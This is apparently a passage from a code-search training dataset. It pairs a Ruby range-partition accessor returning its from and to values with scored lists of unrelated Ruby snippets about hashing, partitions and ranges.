target_partition.nil?\n @list[best[1]].add!([Partition.new(src_partition.name, [site], src_partition.tree)])\n else\n target_partition.incr_add_sites!([site])\n end\n\n end\n end\n end",
"def shared_slice(hash_)\n offset_ = @offset\n select_set_ = {}\n hash_.each do |k_, v_|\n if (ainfo_ = @structure.axis(k_))\n aindex_ = ainfo_.axis_index\n unless select_set_.include?(aindex_)\n lindex_ = ainfo_.index(v_)\n if lindex_\n offset_ += ainfo_.step * lindex_\n select_set_[aindex_] = true\n end\n end\n end\n end\n Table.new(@structure.substructure_omitting(select_set_.keys),\n :acquire => @vals, :offset => offset_, :parent => self)\n end",
"def rehash\n capacity = @capacity\n entries = @entries\n\n @entries = Entries.new @capacity\n\n i = -1\n while (i += 1) < capacity\n next unless old = entries[i]\n while old\n old.next = nil if nxt = old.next\n\n index = key_index(old.key_hash = old.key.hash)\n if entry = @entries[index]\n old.next = entry\n end\n @entries[index] = old\n\n old = nxt\n end\n end\n\n self\n end",
"def div_h_p_r(a,b)\n p = 0\n\n @bits.times do\n # (i) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii) p=p-b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p -= b\n if (p < 0)\n # (iv) restore p\n p += b\n else\n # (iii) if p >= 0\n a |= 1\n end\n end\n [lo(a),lo(p)]\n end",
"def rehash\n buckets.compact.each do |key, value|\n insert(key, value)\n end\n end",
"def update_slots(hash)\n hash.each do |k, v|\n self[k] = v\n end\n\n self\n end",
"def is_divisible_using_hashing(arr, k)\n n = arr.length\n hsh = {}\n # collect reminders and their occurences\n for i in 0...n\n if hsh[arr[i] % k]\n hsh[arr[i] % k] += 1\n else\n hsh[arr[i] % k] = 1 \n end \n end\n\n # traverse array again to check reminders with following possiblities\n # 1. if reminder is 0, then its occurence must be > 1\n # 2. if reminder divides k in two halves, then its occurence must be > 1\n # 3. if reminder occurence is same as k - reminder occurence\n\n for i in 0...n\n rem = arr[i] % k\n if rem * 2 == k || rem == 0\n if hsh[rem] == 1\n return false\n end \n else\n if hsh[rem] != hsh[k-rem]\n return false\n end \n end \n end \n true\nend",
"def rekey_as_needed; end",
"def hsub!(hash)\n self.class.hsub(self, hash)\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def divmod(val); end",
"def change(hash); end",
"def update!(**args)\n @next_page_token = args[:next_page_token] if args.key?(:next_page_token)\n @partitions = args[:partitions] if args.key?(:partitions)\n end",
"def testReorderingChangingCrossPartition\n executeSimpleTest(\n [ [ 'T1', 'R1', 900, 5, ['T2'], '==== ='],\n [ 'T2', 'R2', 800, 2, [], ' =='],\n [ 'T3', 'R2', 700, 2, ['T4'], ' =='],\n [ 'T4', 'R1', 600, 2, ['T5'], ' =='],\n [ 'T5', 'R3', 1000, 2, [], ' =='],\n [ 'T6', 'R4', 100, 5, ['T5'], '====='],\n [ 'T7', 'R2', 200, 2, ['T8'], '=='],\n [ 'T8', 'R5', 2000, 2, [], ' =='],\n [ 'T9', 'R6', 300, 3, ['T8'], '==='] ] )\n end",
"def set_composite_key(&block)\n if persisted? && key_field_changed?\n swap_composite_keys(&block)\n else\n identify and block.call\n end\n end"
] |
[
"0.65524477",
"0.62586033",
"0.56729954",
"0.5489327",
"0.54774976",
"0.5430847",
"0.5423311",
"0.54208827",
"0.5387516",
"0.53596234",
"0.5349726",
"0.5324894",
"0.53132087",
"0.5308499",
"0.52947605",
"0.5264948",
"0.52567273",
"0.52390057",
"0.52349293",
"0.522618",
"0.5206389",
"0.5179654",
"0.5155142",
"0.51543117",
"0.51538557",
"0.51469105",
"0.5127821",
"0.5115603",
"0.5111907",
"0.5107685",
"0.5089773",
"0.5089735",
"0.5087324",
"0.5082239",
"0.50813675",
"0.50785977",
"0.5076999",
"0.5044362",
"0.50417894",
"0.5037564",
"0.5021555",
"0.5020975",
"0.50136596",
"0.50114393",
"0.49926487",
"0.49896836",
"0.49797583",
"0.49721894",
"0.49692717",
"0.4966803",
"0.49634182",
"0.49550948",
"0.49532104",
"0.4935253",
"0.49273884",
"0.4920946",
"0.49158034",
"0.48978424",
"0.48944047",
"0.4880884",
"0.48782203",
"0.4873882",
"0.48669997",
"0.48623326",
"0.48444813",
"0.48423117",
"0.48294538",
"0.48282343",
"0.48115903",
"0.48083386",
"0.48056707",
"0.4794157",
"0.47854766",
"0.47794208",
"0.47717014",
"0.47678304",
"0.47661564",
"0.47628614",
"0.47620118",
"0.4759223",
"0.47557938",
"0.47458",
"0.4741385",
"0.47354048",
"0.47345203",
"0.47323063",
"0.4727006",
"0.47249272",
"0.47173205",
"0.47125414",
"0.47106403",
"0.47100732",
"0.47071335",
"0.4699888",
"0.46962962",
"0.4695913",
"0.4692997",
"0.46871272",
"0.46808907",
"0.46808586"
] |
0.5119667
|
27
|
Marks this as the default partition, where values not matching any other partition are stored.
|
def default
@default = true
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def set_default_cluster\n if study.default_options[:cluster].nil?\n cluster = study.cluster_groups.by_name(cluster_name_by_file_type)\n study.default_options[:cluster] = cluster.name if cluster.present?\n end\n end",
"def reset_default_cluster(study:)\n if study.cluster_groups.by_name(study.default_options[:cluster]).nil?\n study.default_options[:cluster] = nil\n study.save\n end\n end",
"def set_default_values\n self.synced_with_gram = false\n end",
"def set_default_values\n self.synced_with_gram = false\n end",
"def set_default\n end",
"def set_defaults\n unless persisted?\n end\n end",
"def default_slot (slot_num)\r\n @default_slot = slot_num\r\n end",
"def set_conf_default(conf)\n end",
"def set_conf_default(conf)\n end",
"def default_values\n self.trash ||= false\n end",
"def set_study_default_options\n @default_cluster = @study.default_cluster\n @default_cluster_annotations = {\n 'Study Wide' => @study.viewable_metadata.map {|metadata| metadata.annotation_select_option }\n }\n unless @default_cluster.nil?\n @default_cluster_annotations['Cluster-based'] = @default_cluster.cell_annotations\n .keep_if {|annot| @default_cluster.can_visualize_cell_annotation?(annot)}\n .map {|annot| @default_cluster.formatted_cell_annotation(annot)}\n end\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def default\n igetset(:default) { nil }\n end",
"def default=(val)\n self['default'] = val\n end",
"def default_cluster\n default = self.cluster_groups.first\n unless self.default_options[:cluster].nil?\n new_default = self.cluster_groups.by_name(self.default_options[:cluster])\n unless new_default.nil?\n default = new_default\n end\n end\n default\n end",
"def set_study_default_options\n @default_cluster = @study.default_cluster\n @default_cluster_annotations = {\n 'Study Wide' => @study.cell_metadata.map {|metadata| [\"#{metadata.name}\", \"#{metadata.name}--#{metadata.annotation_type}--study\"] }.uniq\n }\n unless @default_cluster.nil?\n @default_cluster_annotations['Cluster-based'] = @default_cluster.cell_annotations.map {|annot| [\"#{annot[:name]}\", \"#{annot[:name]}--#{annot[:type]}--cluster\"]}\n end\n end",
"def set_default(value)\r\n\t\t\tself.default_value = value\r\n\t\tend",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def set_default_item_location\n \tself.actual_storage_location = self.item.storage_location\n end",
"def reset_default_annotation(study:)\n current_default = study.default_annotation\n annot_name, annot_type, annot_scope = current_default&.split('--')\n case annot_scope\n when 'study'\n current_default = nil if study.cell_metadata.by_name_and_type(annot_name, annot_type).nil?\n when 'cluster'\n cluster = study.default_cluster\n annotation = cluster&.cell_annotations&.detect { |ca| ca[:name] == annot_name && ca[:type] == annot_type }\n current_default = nil if cluster.nil? || annotation.nil?\n else\n current_default = nil\n end\n if study.default_annotation != current_default\n study.default_options[:annotation] = current_default\n study.save\n end\n end",
"def set_study_default_options\n @default_cluster = @study.default_cluster\n @default_cluster_annotations = {\n 'Study Wide' => @study.study_metadata.map {|metadata| [\"#{metadata.name}\", \"#{metadata.name}--#{metadata.annotation_type}--study\"] }.uniq\n }\n unless @default_cluster.nil?\n @default_cluster_annotations['Cluster-based'] = @default_cluster.cell_annotations.map {|annot| [\"#{annot[:name]}\", \"#{annot[:name]}--#{annot[:type]}--cluster\"]}\n end\n end",
"def default_values\n\t\tself.max_student ||= 0\n\t\tself.backup_student ||= 0\n\tend",
"def default(default)\n @default = default\n end",
"def default_pri=(v)\n @@default_pri = v\n end",
"def DefaultExtJournalSize(part)\n part = deep_copy(part)\n if Ops.get_symbol(part, \"used_fs\", :unknown) == :ext2\n Builtins.y2milestone(\"No journal on ext2\")\n return 0\n end\n\n ret = 0\n\n part_size = Ops.multiply(1024, Ops.get_integer(part, \"size_k\", 0))\n # default block size is 4k\n bs = Builtins.tointeger(\n Ops.get_string(\n part,\n [\"fs_options\", \"opt_blocksize\", \"option_value\"],\n \"4096\"\n )\n )\n blocks = Ops.divide(part_size, bs)\n\n Builtins.y2milestone(\n \"Partition %1: %2 blocks (block size: %3)\",\n Ops.get_string(part, \"name\", \"\"),\n blocks,\n bs\n )\n\n # values extracted from ext2fs_default_journal_size() function in e2fsprogs sources\n if Ops.less_than(blocks, 2048)\n ret = 0\n elsif Ops.less_than(blocks, 32768)\n ret = 1024\n elsif Ops.less_than(blocks, 256 * 1024)\n ret = 4096\n elsif Ops.less_than(blocks, 512 * 1024)\n ret = 8192\n elsif Ops.less_than(blocks, 1024 * 1024)\n ret = 16384\n else\n # maximum journal size\n ret = 32768\n end\n\n # converts blocks to bytes\n ret = Ops.multiply(ret, bs)\n\n Builtins.y2milestone(\"Default journal size: %1kB\", Ops.divide(ret, 1024))\n\n\n ret\n end",
"def slice_with_default(*keys, default: nil)\n\t\t\t\tkeys.each_with_object(::Hash.new) do |k, hash| \n\t\t\t\t\tif has_key?(k) || default == :default_proc\n\t\t\t\t\t\thash[k] = self[k] \n\t\t\t\t\telse\n\t\t\t\t\t\thash[k] = default\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend",
"def SetSelectedToValid\n @selectedRootPartition = \"\"\n Builtins.foreach(@rootPartitions) do |p, i|\n if Ops.get_boolean(i, :valid, false) && @selectedRootPartition == \"\"\n @selectedRootPartition = p\n end\n end\n\n nil\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def default_values\n self.deleted ||= '0'\n end",
"def make_default_only_one_variant\n if self.variant? and self.default_changed?\n # If there are variants other than default variant.\n if self.parent.variants.count > 1\n self.parent.variants.each do |variant|\n variant.update_column(:default, false)\n end\n end\n # Otherwise current or default variant will be true\n self.update_column(:default, true)\n end\n end",
"def set_default_participant\n return if detached # skip if study is detached, which is common in test environment\n\n begin\n path = Rails.root.join('data', self.data_dir, 'default_participant.tsv')\n entity_file = File.new(path, 'w+')\n entity_file.write \"entity:participant_id\\ndefault_participant\"\n entity_file.close\n upload = File.open(entity_file.path)\n ApplicationController.firecloud_client.import_workspace_entities_file(self.firecloud_project, self.firecloud_workspace, upload)\n Rails.logger.info \"#{Time.zone.now}: created default_participant for #{self.firecloud_workspace}\"\n File.delete(path)\n rescue => e\n ErrorTracker.report_exception(e, user, self)\n Rails.logger.error \"Unable to set default participant: #{e.message}\"\n end\n end",
"def default!(index)\n Entity.reset_value(index,@defaults[index.to_s])\n end",
"def default_values\n {name: \"default\", index: -1, experiment_id: nil}\n end",
"def default_cluster_point_size\n if self.default_options[:cluster_point_size].blank?\n 3\n else\n self.default_options[:cluster_point_size].to_i\n end\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def select_default_values\n return if @default_value.nil?\n # NOTE list not yet created\n raise \"list has not yet been created\" unless @list\n index = node_to_row @default_value\n raise \"could not find node #{@default_value}, #{@list} \" unless index\n return unless index\n @current_index = index\n toggle_row_selection\n @default_value = nil\n end",
"def set_default\n cmd = \"{\\\"id\\\":8,\\\"method\\\":\\\"set_default\\\",\\\"params\\\":[]}\\r\\n\"\n request(cmd)\n end",
"def default=(new_default)\n @default_proc = nil\n @default = new_default\n end",
"def reset_is_default_flags\n if self.is_default == true\n self.dataset.weights.get_all_but(self.id).update_all(is_default: false)\n end\n end",
"def set_defaults\n self.bucket_agency_allocations = []\n end",
"def default(default)\n @default = default\n self\n end",
"def default=(p0) end",
"def key_partition\n Dynamoid::Config.partitioning? ? \".#{Random.rand(Dynamoid::Config.partition_size)}\" : ''\n end",
"def set_default(key, val)\n set(key, val) unless @config.key?(key)\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def set_defaults\n end",
"def set_defaults\n end",
"def select_group_loan_to_be_declared_as_default\n setup_select_group_loan\n @default_declarable_group_loans = @office.default_declarable_group_loans\n end",
"def set_vbmanage_machinefolder_default()\n system(\"vboxmanage setproperty machinefolder default\")\n _track_ai_event(__method__, {\n 'vm_name': vm_name\n })\n end",
"def set_default\n @manager.set_default(@entity['id']) if @manager.respond_to?(:set_default)\n end",
"def default=(value)\n @default = value\n end",
"def default_bucket\n @default_bucket ||= buckets.uncategorised.first || buckets.uncategorised.create!(name: 'Uncategorised')\n end",
"def partitioned_state\n super\n end",
"def defaults\n owner.volume(:root).reverse_merge!({\n :device => '/dev/sda1',\n :mount_point => '/',\n :mountable => false,\n })\n self.reverse_merge!({\n :availability_zones => ['us-east-1d'],\n :backing => 'ebs',\n :flavor => 't1.micro',\n })\n super\n end",
"def deferred_defaults\n set_default_path\n set_default_properties\n end",
"def set_default\n @manager.set_default(entity['id']) if @manager.respond_to?(:set_default)\n end",
"def reset_is_default_flags\n if self.is_default == true\n self.time_series.weights.get_all_but(self.id).update_all(is_default: false)\n end\n end",
"def set_defaults\n\n end",
"def set_defaults\n\n end",
"def set_defaults\n\n end",
"def set_defaults\n\n end",
"def set_defaults\n\n end",
"def set_defaults\n\n end",
"def set_default_values\n self.class.defaults.each do |key, default|\n self[key] ||= default\n end\n end",
"def default!\n clear.merge!(defaults)\n end",
"def assign_default(config)\n assign(config, default)\n reset\n config\n end",
"def default_broker=(broker)\n broker = find_broker(broker)\n raise BrokerNotInUseError, 'Default broker must be in use' unless broker_in_use?(broker)\n\n @default_broker = broker\n end",
"def set_default!\n @@default_user = self\n end",
"def preset_default_values( params_hash = {} )\n # XXX AmbGest 1.10 does not have a Firm entity:\n# unless self.firm\n# begin\n# if self.user_id and (default_firm_id = LeUser.find(self.user_id).firm_id)\n# self.firm_id = default_firm_id\n# end\n# rescue\n# self.firm_id = nil\n# end\n# end\n # Set default date for this entry:\n# self.date_last_met = Time.now unless self.date_last_met\n self\n end",
"def default\n @what = :default\n self\n end",
"def reset_default\n \n w=WinReg.new(@file)\n w.debug=@debug\n FOLDER_DEFAULTS.each do |key|\n w.write_key(FOLDERS_BASE+'\\\\'+key[:name],PROFILE_BASE+'\\\\'+key[:dir])\n end\n end",
"def supports_default_partitions?\n postgresql_version >= 110_000\n end",
"def default\n by_id(default_id)\n end",
"def default=(_); end",
"def add!(partition, dirty = false)\n if @list[partition.name].nil?\n @list[partition.name] = partition\n else\n @list[partition.name].merge!(partition, simulate = false, dirty)\n end\n self\n end",
"def default_value \n self[:value] ||= {}\n self[:value][:default_value] ||= []\n self[:value][:default_value].delete('-1')\n self[:value][:default_value]\n end",
"def default=( val )\r\n @opts[:default] = val\r\n end",
"def freeze\n @default_values.freeze\n super\n end",
"def set_default(key, *args, &block)\n set(key, *args, block) unless settings.send(:local?, key.to_sym)\n end",
"def default_queue=(queue)\n @queues[nil] = queue\n end",
"def default=(value)\n self.value = value\n @default = value\n end",
"def default_schema\n nil\n end",
"def as_default!\n self.class.default.all.update_all(priority: self.class.priorities[:common])\n self.default!\n self\n end",
"def initialize(partition_data)\n @partition_data = partition_data\n end",
"def default_entry\n nil\n end",
"def set_default_values\n if self.price.nil?\n self.price = 0.0\n end\n if self.rating.nil?\n self.rating = 0\n end\n if self.enabled.nil?\n self.enabled = false\n end\n if self.no_of_reviews.nil?\n self.no_of_reviews = 0\n end\n if self.no_of_registrations.nil?\n self.no_of_registrations = 0\n end\n end",
"def default_vocabulary(uri)\n @default_vocabulary = uri\n end",
"def set_default_values\n self.points_log ||= POINTS_LOG\n self.points_log_first_of_day ||= POINTS_LOG_FIRST_OF_DAY\n self.points_peer_assessment ||= POINTS_PEER_ASSESSMENT\n self.points_peer_assessment_first_of_team ||= POINTS_PEER_ASSESSMENT_FIRST_OF_TEAM\n self.points_project_evaluation ||= POINTS_PROJECT_EVALUATION\n self.points_project_evaluation_first_of_team ||= POINTS_PROJECT_EVALUATION_FIRST_OF_TEAM\n self.max_logs_per_day ||= MAX_LOGS_PER_DAY\n self.points_project_evaluation_submitted_first_day ||= POINTS_PROJECT_EVALUATION_SUBMITTED_FIRST_DAY\n self.points_peer_assessment_submitted_first_day ||= POINTS_PEER_ASSESSMENT_SUBMITTED_FIRST_DAY\n self.marking_algorithm_id ||= MARKING_ALGORITHM_ID\n end",
"def configured_default\n @options[:default] || default_entry\n end",
"def set_default_annotation\n return if study.default_options[:annotation].present?\n\n cell_metadatum = study.cell_metadata.keep_if(&:can_visualize?).first || study.cell_metadata.first\n cluster = study.cluster_groups.first\n if cluster.present?\n cell_annotation = cluster.cell_annotations.select { |annot| cluster.can_visualize_cell_annotation?(annot) }\n .first || cluster.cell_annotations.first\n else\n cell_annotation = nil\n end\n annotation_object = cell_metadatum || cell_annotation\n return if annotation_object.nil?\n\n if annotation_object.is_a?(CellMetadatum)\n study.default_options[:annotation] = annotation_object.annotation_select_value\n is_numeric = annotation_object.annotation_type == 'numeric'\n elsif annotation_object.is_a?(Hash) && cluster.present?\n study.default_options[:annotation] = cluster.annotation_select_value(annotation_object)\n is_numeric = annotation_object[:type] == 'numeric'\n end\n study.default_options[:color_profile] = 'Reds' if is_numeric\n end",
"def default(duplicate=true)\n duplicate && @dup ? @default.dup : @default\n end",
"def init_default_settings!\n self.class.default_settings.dup.each do |var, vals|\n setting_objects.detect { |s| s.var == var.to_s } || setting_objects.create(var: var.to_s, value: vals, target: self)\n end\n end",
"def set_default\n (!default || value?) ? self : add_value(default)\n end",
"def default\n @type = :default\n end",
"def set_defaults\n self.copied = self.copied.nil? ? false : self.copied\n end",
"def reset_defaults; end",
"def reset\n set(default_preferences)\n end",
"def reset_default_fields\n self.cleared_default_fields.each do |k, v|\n self.send(\"#{k}=\", v)\n end\n end",
"def set_default_role!\n clear!\n end",
"def set_default_role!\n clear!\n end"
] |
[
"0.61621904",
"0.5887786",
"0.5762772",
"0.5762772",
"0.5732178",
"0.5605029",
"0.5546228",
"0.5460707",
"0.5460707",
"0.54267246",
"0.5426431",
"0.5386847",
"0.53852624",
"0.5381668",
"0.53813004",
"0.5363579",
"0.5362803",
"0.53579223",
"0.5354793",
"0.5327952",
"0.53276473",
"0.53261316",
"0.52958196",
"0.52929384",
"0.5262935",
"0.52559614",
"0.5253238",
"0.52413017",
"0.52311766",
"0.52284706",
"0.52034116",
"0.52003294",
"0.51976514",
"0.5191842",
"0.5190469",
"0.51442647",
"0.5133373",
"0.5129859",
"0.51289403",
"0.5125674",
"0.5122097",
"0.5121859",
"0.51191133",
"0.51189744",
"0.5112984",
"0.5109241",
"0.5109241",
"0.5105047",
"0.50981134",
"0.5093653",
"0.50909334",
"0.5087907",
"0.5081659",
"0.5081019",
"0.5080252",
"0.5072293",
"0.50549334",
"0.50432825",
"0.50432825",
"0.50432825",
"0.50432825",
"0.50432825",
"0.50432825",
"0.50410193",
"0.503774",
"0.5031334",
"0.50275034",
"0.5018169",
"0.5014074",
"0.50098777",
"0.50094974",
"0.50037736",
"0.5002709",
"0.49829292",
"0.49823698",
"0.49793628",
"0.49695605",
"0.49639505",
"0.4962265",
"0.49611518",
"0.4957069",
"0.49536648",
"0.49532884",
"0.49512494",
"0.49499235",
"0.49462658",
"0.4946219",
"0.4946046",
"0.49459943",
"0.49387854",
"0.4913255",
"0.49023947",
"0.49005437",
"0.48940918",
"0.48921835",
"0.4890158",
"0.4881076",
"0.4875604",
"0.48724183",
"0.48724183"
] |
0.5201624
|
31
|
The from and to values of this partition for a range partition.
|
def range
[@from, @to]
end
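
For illustration, a minimal runnable sketch of the builder such an accessor typically sits on; the class name and the from/to writer methods are assumptions, only range itself comes from the row above.

# Hedged sketch: the writers are assumed, not taken from the source row.
class RangePartitionSketch
  # Assumed writer for the lower bound of the range.
  def from(value)
    @from = value
  end

  # Assumed writer for the upper bound of the range.
  def to(value)
    @to = value
  end

  # The from and to values of this partition for a range partition.
  def range
    [@from, @to]
  end
end

gen = RangePartitionSketch.new
gen.from 1
gen.to 100
gen.range # => [1, 100]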
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def range\n (@from..@to)\n end",
"def range\n @from..@to\n end",
"def collect\n [@range_low, @range_high]\n end",
"def range\n\t\t\t#(@end > @start) ? (@start .. @end) : (@end .. @start)\n\t\t\t(start .. self.end)\n\t\tend",
"def ranges\n attributes.fetch(:ranges)\n end",
"def from_ranges\n attributes.fetch(:fromRanges)\n end",
"def m_range\r\n end",
"def values(range = nil)\n result_unflatten = if !::RANGES_JRUBY_BUG\n map { |x| x.v }\n else\n self.v\n end\n result = result_unflatten.flatten\n if range\n relevant_result = []\n result.each_with_index { |row_or_column, i| relevant_result << row_or_column if range.include?(i) }\n relevant_result\n else\n result\n end\n end",
"def range(from, to)\n from_query(raw_range(from, to))\n end",
"def range\n min, max = span\n min..max\n end",
"def range \n Range.new(@first, @last)\n end",
"def ranges\n pairs.map { |b, e| (b...e) }\n end",
"def to_range\n min .. max\n end",
"def range\n attributes.fetch(:range)\n end",
"def range\n attributes.fetch(:range)\n end",
"def range\n attributes.fetch(:range)\n end",
"def range\n attributes.fetch(:range)\n end",
"def to_range\n Range.new(self.start, self.end)\n end",
"def range( range )\n ::Vector.elements( range.to_a )\n end",
"def to_range\n (@start_date..@end_date)\n end",
"def ranges\n x_start, y_start = absolute(0, 0)\n x_end, y_end = absolute(@diameter - 1, @diameter - 1)\n\n [x_start..x_end, y_start..y_end]\n end",
"def to_range\n start_date..end_date\n end",
"def range\n @range ||= set_range\n end",
"def split_range(range)\n start, finish = range.begin, range.end\n start += length if start < 0\n finish += length if finish < 0\n \n [start, finish - start - (range.exclude_end? ? 1 : 0)]\n end",
"def to_ranges args = Hash.new\n min = args[:min] || -Infinity\n max = args[:max] || Infinity\n collapse = args[:collapse]\n \n ranges = Array.new\n self.split(%r{\\s*,\\s*}).each do |section|\n md = section.match(RANGE_REGEXP)\n next unless md\n \n from = _matchdata_to_number md, 1, min\n to = _has_matchdata?(md, 2) ? _matchdata_to_number(md, 3, max) : from\n\n prevrange = ranges[-1]\n\n if collapse && prevrange && prevrange.include?(from - 1) && prevrange.include?(to - 1)\n ranges[-1] = (prevrange.first .. to)\n else\n ranges << (from .. to)\n end\n end\n\n ranges\n end",
"def range(range)\n opts[:min] = range.begin\n opts[:max] = range.end\n end",
"def compute_local_range()\n begin_index = time2index(local_range.begin)\n end_index = time2index(local_range.end, -1) # FIXME this gives an unreachable index causing Exceptions down the line...\n begin_index..end_index\n end",
"def to_range\n\t\tIP.parse(self.start_ip)..IP.parse(self.end_ip)\n\tend",
"def range; end",
"def range; end",
"def range; end",
"def &(range)\n return nil unless overlaps?(range) || touching?(range)\n PosRange.new [@start, range.start].max, [@end, range.end].min\n end",
"def range=(range)\n @range = range\n end",
"def vt_range\n ARange.new(vtstart_at, vtend_at)\n end",
"def range(data)\n return (minimum(data)..maximum(data))\n end",
"def range\n from_truncated..to_truncated\n end",
"def range=(range)\n @range = range\n end",
"def get_range(from, to, options = {})\n if options.delete(:include_boundaries)\n connection.zrevrangebyscore(key_label, to, from, options)\n else\n connection.zrevrangebyscore(key_label, \"(#{to}\", \"(#{from}\", options)\n end\n end",
"def get_bounds\n [ @min, @max ]\n end",
"def offset_range\n return nil unless original_tag\n if original_end_tag\n end_offset = end_pos.offset + original_end_tag.bytesize\n else\n end_offset = start_pos.offset + original_tag.bytesize\n end\n\n start_pos.offset...end_offset\n end",
"def range(range)\n assert_range range\n schema do |s|\n s.type range.begin.is_a?(Integer) ? 'integer' : 'number'\n s.minimum range.begin\n s.maximum range.end, exclusive: range.exclude_end? unless range.end.nil?\n end\n end",
"def divide_range_into_values(range_size, start_value, end_value, is_derived_values = true)\n values = []\n # How big is x-range? What should the step size be?\n # Generally we want a hundred display points. Let's start there.\n if range_size < 1.1\n step_size = is_derived_values ? 0.01 : 0.1\n elsif range_size < 11\n step_size = is_derived_values ? 0.1 : 1\n elsif range_size < 111\n step_size = is_derived_values ? 1 : 10\n elsif range_size < 1111\n step_size = is_derived_values ? 10 : 100\n elsif range_size < 11111\n step_size = is_derived_values ? 100 : 1000\n elsif range_size < 111111\n step_size = is_derived_values ? 1000 : 10000\n else \n step_size = is_derived_values ? 10000 : 100000\n end\n grid_x = start_value\n while grid_x < end_value\n values << grid_x\n grid_x = grid_x + step_size\n end\n values\n end",
"def _range from, to\n\t\trange = `IDBKeyRange.bound(#{from}, #{to})`\n\t\tEnumerator.new do |out, done|\n\t\t\ttry do\n\t\t\t\ttransaction = `#@db.transaction(['kv'], 'readonly')`\n\t\t\t\tstore = `#{transaction}.objectStore('kv')`\n\t\t\t\tindex = `#{store}.index('key')`\n\t\t\t\t%x{#{index}.openCursor(#{range}).onsuccess = function(e) {\n\t\t\t\t\tvar cursor = e.target.result\n\t\t\t\t\tif(cursor) {\n\t\t\t\t\t\t// #{log `cursor.value.key`, `cursor.value.val`}\n\t\t\t\t\t\t// debugger\n\t\t\t\t\t\t#{out << [`cursor.value.key`, `cursor.value.val`]}\n\t\t\t\t\t\tcursor.continue()\n\t\t\t\t\t} else {\n\t\t\t\t\t\t#{done[]}\n\t\t\t\t\t}\n\t\t\t\t}}\n\t\t\tend\n\t\tend.lazy\n\tend",
"def range(start, stop)\n fetch(key.call(\"LRANGE\", start, stop))\n end",
"def get_range(line_from, index_from, line_to, index_to) \n\t\tix1 = index_of_position(line_from, index_from)\n\t\tix2 = index_of_position(line_to, index_to)\n\t\t@text[ix1 ... ix2]\n\tend",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def set_range\n ref_gene = ref_genes.first\n [ref_gene.txStart, ref_gene.txEnd]\n end",
"def to_range\n case\n when open?, unknown?\n nil\n else\n Range.new(unknown_start? ? Date.new : @from, max)\n end\n end",
"def range_start; range.first; end",
"def range\n @cached_range ||= get_range\n end",
"def cell_range= range\n start_cell, end_cell = range.split(\":\")\n unless start_cell.nil? || start_cell.match(/^[a-zA-Z]+[1-9][0-9]*$/).nil?\n start_cell = start_cell.upcase\n self.start_column, self.start_row = from_alpha(start_cell.sub(/[0-9]+/,\"\")), start_cell.sub(/[A-Z]+/,\"\").to_i\n self.end_column, self.end_row = nil, nil\n if end_cell.nil?\n self.end_column = self.start_column\n self.end_row = self.start_row\n else\n end_cell = end_cell.upcase\n unless end_cell.match(/^[a-zA-Z]+[1-9][0-9]*$/).nil?\n self.end_column, self.end_row = from_alpha(end_cell.sub(/[0-9]+/,\"\")), end_cell.sub(/[A-Z]+/,\"\").to_i\n else\n start_row = nil\n end\n end\n else\n start_row = nil\n end\n end",
"def query_range(left, right)\n \n end",
"def query_range(left, right)\n \n end",
"def range_value\n string_value\n end",
"def query(from, to)\n low = [from, to].min\n high = [from, to].max\n \n # Get the values\n values = self[low..high]\n \n # Allow crick querying\n values.reverse! if from > to\n return values\n end",
"def sliced_print_range\n whole_range = (@lower..@upper).to_a\n whole_range.each_slice(@size).to_a\n end",
"def parse_range\n val = super || return\n val.begin == val.end ? val.begin : val\n end",
"def tt_range\n ARange.new(ttstart_at, ttend_at)\n end",
"def selection_range(from, to)\n execute(:selection, :range, from, to)\n end",
"def d_range\n (d...dn_position).to_a\n end",
"def d_range\n (d...dn_position).to_a\n end",
"def rdfs_range\n end",
"def range\n (start_date...end_date) #exclusive date range\n end",
"def enterprise_i_p_ranges\n return @enterprise_i_p_ranges\n end",
"def boundaries\n [intervals.first[0], intervals.last[1]]\n end",
"def declare_beg_range\n\t\t@beg_range = @beg_range.to_date \n\t\t@end_range = @end_range.to_date \n\tend",
"def to_s\n @_range\n end",
"def bsearch_range (range = 0 ... self.length, &block)\r\n lower = bsearch_lower_boundary(range, &block)\r\n upper = bsearch_upper_boundary(range, &block)\r\n return lower ... upper\r\n end",
"def search_range(array, range=nil, &block)\n lower = search_lower_boundary(array, range, &block)\n upper = search_upper_boundary(array, range, &block)\n return lower ... upper\n end",
"def range(arr)\n\nend",
"def range_map\n @range_map ||= ranges.inject({}) do |res, (key, value)|\n range = value.split('-').map(&:to_i)\n res.merge! key => Range.new(range.first, range.last)\n end\n end",
